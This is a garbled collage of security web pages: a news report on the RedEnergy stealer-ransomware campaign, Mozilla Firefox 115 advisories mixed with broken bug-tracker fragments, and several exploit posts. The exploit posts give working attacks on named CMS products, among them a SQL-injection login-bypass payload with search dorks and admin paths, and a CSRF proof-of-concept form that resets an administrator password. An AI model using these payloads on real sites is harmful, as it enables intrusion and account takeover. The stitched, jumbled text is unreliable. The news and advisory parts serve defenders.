A sophisticated stealer-as-a-ransomware threat dubbed RedEnergy has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages.
The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for

Critical Infrastructure Security

A sophisticated stealer-as-a-ransomware threat dubbed **RedEnergy** has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages.

The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities," Zscaler researchers Shatak Jain and Gurkirat Singh said in a recent analysis.

The goal, the researchers noted, is to couple data theft with encryption with the goal of inflicting maximum damage to the victims.

The starting point for the multi-stage attack is a FakeUpdates (aka SocGholish) campaign that tricks users into downloading JavaScript-based malware under the guise of web browser updates.

What makes it novel is the use of reputable LinkedIn pages to target victims, redirecting users clicking on the website URLs to a bogus landing page that prompts them to update their web browsers by clicking on the appropriate icon (Google Chrome, Microsoft Edge, Mozilla Firefox, or Opera), doing so which results in the download a malicious executable.

Following a successful breach, the malicious binary is used as a conduit to set up persistence, perform the actual browser update, and also drop a stealer capable of covertly harvesting sensitive information and encrypting the stolen files, leaving the victims at risk of potential data loss, exposure, or even the sale of their valuable data.

Zscaler said it discovered suspicious interactions taking place over a File Transfer Protocol (FTP) connection, raising the possibility that valuable data is being exfiltrated to actor-controlled infrastructure.

In the final stage, RedEnergy's ransomware component proceeds to encrypt the user's data, suffixing the ".FACKOFF!" extension to each encrypted file, deleting existing backups, and dropping a ransom note in each folder.

Victims are expected to make a payment of 0.005 BTC (about $151) to a cryptocurrency wallet mentioned in the note to regain access to the files. RedEnergy's dual functions as a stealer and ransomware represent an evolution of the cybercrime landscape.

The development also follows the emergence of a new RAT-as-a-ransomware threat category in which remote access trojans such as Venom RAT and Anarchy Panel RAT have been equipped with ransomware modules to lock various file extensions behind encryption barriers.

"It is crucial for individuals and organizations to exercise utmost caution when accessing websites, especially those linked from LinkedIn profiles," the researchers said. "Vigilance in verifying the authenticity of browser updates and being wary of unexpected file downloads is paramount to protect against such malicious campaigns."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

RedEnergy Stealer-as-a-Ransomware Threat Targeting Energy and Telecom Sectors

Memory safety bugs present in Firefox 114, Firefox ESR 102.12, and Thunderbird 102.12. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 115, Firefox ESR < 102.13, and Thunderbird < 102.13.

Wed Jul 5 2023 03:44:30 PDT  

*   **Bug ID:** 1832306, 1834862, 1835886, 1836550, 1837450?cve=title

**Zarro Boogs found.**

We couldn't find any bugs matching your search terms. You could try searching with fewer or different terms.

*   File a new bug
*   Edit this search
*   Start a new search

  

REST | CSV | Feed | iCalendar

Edit Search

 

as

CVE-2023-37211: Bug List

Uploading files which contain symlinks may have allowed an attacker to trick a user into submitting sensitive data to a malicious website. This vulnerability affects Firefox < 115.

Sorry, I can't find "_1813299?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-37206: Invalid Bug ID

When Firefox is configured to block storage of all cookies, it was still possible to store data in localstorage by using an iframe with a source of 'about:blank'. This could have led to malicious websites storing tracking data without permission. This vulnerability affects Firefox < 115.

**Mozilla Foundation Security Advisory 2023-22**

Announced

July 4, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 115

**#CVE-2023-3482: Block all cookies bypass for localstorage**

Reporter

Martin Hostettler

Impact

moderate

**Description**

When Firefox is configured to block storage of all cookies, it was still possible to store data in localstorage by using an iframe with a source of 'about:blank'. This could have led to malicious websites storing tracking data without permission.

**References**

*   Bug 1839464

**#CVE-2023-37201: Use-after-free in WebRTC certificate generation**

Reporter

Irvan Kurniawan

Impact

high

**Description**

An attacker could have triggered a use-after-free condition when creating a WebRTC connection over HTTPS.

**References**

*   Bug 1826002

**#CVE-2023-37202: Potential use-after-free from compartment mismatch in SpiderMonkey**

Reporter

zx

Impact

high

**Description**

Cross-compartment wrappers wrapping a scripted proxy could have caused objects from other compartments to be stored in the main compartment resulting in a use-after-free.

**References**

*   Bug 1834711

**#CVE-2023-37203: Drag and Drop API may provide access to local system files**

Reporter

Paul Nickerson

Impact

moderate

**Description**

Insufficient validation in the Drag and Drop API in conjunction with social engineering, may have allowed an attacker to trick end-users into creating a shortcut to local system files. This could have been leveraged to execute arbitrary code.

**References**

*   Bug 291640

**#CVE-2023-37204: Fullscreen notification obscured via option element**

Reporter

Irvan Kurniawan

Impact

moderate

**Description**

A website could have obscured the fullscreen notification by using an option element by introducing lag via an expensive computational function. This could have led to user confusion and possible spoofing attacks.

**References**

*   Bug 1832195

**#CVE-2023-37205: URL spoofing in address bar using RTL characters**

Reporter

Rohan Sharma

Impact

moderate

**Description**

The use of RTL Arabic characters in the address bar may have allowed for URL spoofing.

**References**

*   Bug 1704420

**#CVE-2023-37206: Insufficient validation of symlinks in the FileSystem API**

Reporter

Ameen Basha M K

Impact

moderate

**Description**

Uploading files which contain symlinks may have allowed an attacker to trick a user into submitting sensitive data to a malicious website.

**References**

*   Bug 1813299

**#CVE-2023-37207: Fullscreen notification obscured**

Reporter

Shaheen Fazim

Impact

moderate

**Description**

A website could have obscured the fullscreen notification by using a URL with a scheme handled by an external program, such as a mailto URL. This could have led to user confusion and possible spoofing attacks.

**References**

*   Bug 1816287

**#CVE-2023-37208: Lack of warning when opening Diagcab files**

Reporter

Puf

Impact

moderate

**Description**

When opening Diagcab files, Firefox did not warn the user that these files may contain malicious code.

**References**

*   Bug 1837675

**#CVE-2023-37209: Use-after-free in \`NotifyOnHistoryReload\`**

Reporter

Simon Descarpentries

Impact

moderate

**Description**

A use-after-free condition existed in NotifyOnHistoryReload where a LoadingSessionHistoryEntry object was freed and a reference to that object remained. This resulted in a potentially exploitable condition when the reference to that object was later reused.

**References**

*   Bug 1837993

**#CVE-2023-37210: Full-screen mode exit prevention**

Reporter

Hafiizh

Impact

low

**Description**

A website could prevent a user from exiting full-screen mode via alert and prompt calls. This could lead to user confusion and possible spoofing attacks.

**References**

*   Bug 1821886

**#CVE-2023-37211: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and Thunderbird 102.13**

Reporter

Andrew McCreight, Matthew Gaudet, Tom Ritter, and the Mozilla Fuzzing Team,

Impact

high

**Description**

Memory safety bugs present in Firefox 114, Firefox ESR 102.12, and Thunderbird 102.12. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and Thunderbird 102.13

**#CVE-2023-37212: Memory safety bugs fixed in Firefox 115**

Reporter

Andrew McCreight, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 114. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 115

CVE-2023-3482: Security Vulnerabilities fixed in Firefox 115

A use-after-free condition existed in `NotifyOnHistoryReload` where a `LoadingSessionHistoryEntry` object was freed and a reference to that object remained.  This resulted in a potentially exploitable condition when the reference to that object was later reused. This vulnerability affects Firefox < 115.

Sorry, I can't find "_1837993?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-37209: Invalid Bug ID

When opening Diagcab files, Firefox did not warn the user that these files may contain malicious code. This vulnerability affects Firefox < 115, Firefox ESR < 102.13, and Thunderbird < 102.13.

**Mozilla Foundation Security Advisory 2023-23**

Announced

July 4, 2023

Impact

high

Products

Firefox ESR

Fixed in

*   Firefox ESR 102.13

**#CVE-2023-37201: Use-after-free in WebRTC certificate generation**

Reporter

Irvan Kurniawan

Impact

high

**Description**

An attacker could have triggered a use-after-free condition when creating a WebRTC connection over HTTPS.

**References**

*   Bug 1826002

**#CVE-2023-37202: Potential use-after-free from compartment mismatch in SpiderMonkey**

Reporter

zx

Impact

high

**Description**

Cross-compartment wrappers wrapping a scripted proxy could have caused objects from other compartments to be stored in the main compartment resulting in a use-after-free.

**References**

*   Bug 1834711

**#CVE-2023-37207: Fullscreen notification obscured**

Reporter

Shaheen Fazim

Impact

moderate

**Description**

A website could have obscured the fullscreen notification by using a URL with a scheme handled by an external program, such as a mailto URL. This could have led to user confusion and possible spoofing attacks.

**References**

*   Bug 1816287

**#CVE-2023-37208: Lack of warning when opening Diagcab files**

Reporter

Puf

Impact

moderate

**Description**

When opening Diagcab files, Firefox did not warn the user that these files may contain malicious code.

**References**

*   Bug 1837675

**#CVE-2023-37211: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and Thunderbird 102.13**

Reporter

Andrew McCreight, Matthew Gaudet, Tom Ritter, and the Mozilla Fuzzing Team,

Impact

high

**Description**

Memory safety bugs present in Firefox 114, Firefox ESR 102.12, and Thunderbird 102.12. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and Thunderbird 102.13

CVE-2023-37208: Security Vulnerabilities fixed in Firefox ESR 102.13

The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.

CVE-2023-3133: Tutor LMS – eLearning and online course solution

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

AppleZeed CMS 2.0 SQL Injection

Allhandsmarketing CMS version 3.01 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Allhandsmarketing CMS v3.01 SQL Injection Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://www.allhandsmarketing.com/                                                                                  |  | # Dork      : " Design by Allhandsmarketing."                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/laemsingwhitehousenet/showdeals-details.php?id=21 <====| inject here[+] http://127.0.0.1/pannresidence.com/backend/ <====| LoginGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Allhandsmarketing CMS 3.01 SQL Injection

Allhandsmarketing LMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Allhandsmarketing LMS v2.0 CSRF Vulnerability                                                                      |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : http://www.allhandsmarketing.com/                                                                                  |    
| # Dork      : " Design by Allhandsmarketing."                                                                                    |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin Password.

[+] Go to the line 1.

[+] Set the target site link Save changes and apply . 

[+] infected file : /backend/add_newPassword.php .

[+] save code as poc.html .

[+] default user : admin

[+] <form class="form-horizontal" action="http://TARGET/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">  
                                    </div>  
                                </div>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>  
                                </div>

                                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>  
                                </div>

                                                            </fieldset>

                            <div class="">  
                                <div class="row">  
                                    <div class="col-md-12">  
                                        <button class="btn btn-default" type="clear">  
                                            Cancel  
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">  
                                            <i class="fa fa-save"></i>  
                                            Submit  
                                        </button>  
                                    </div>  
                                </div>  
                            </div>

                        </form>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Tag

#firefox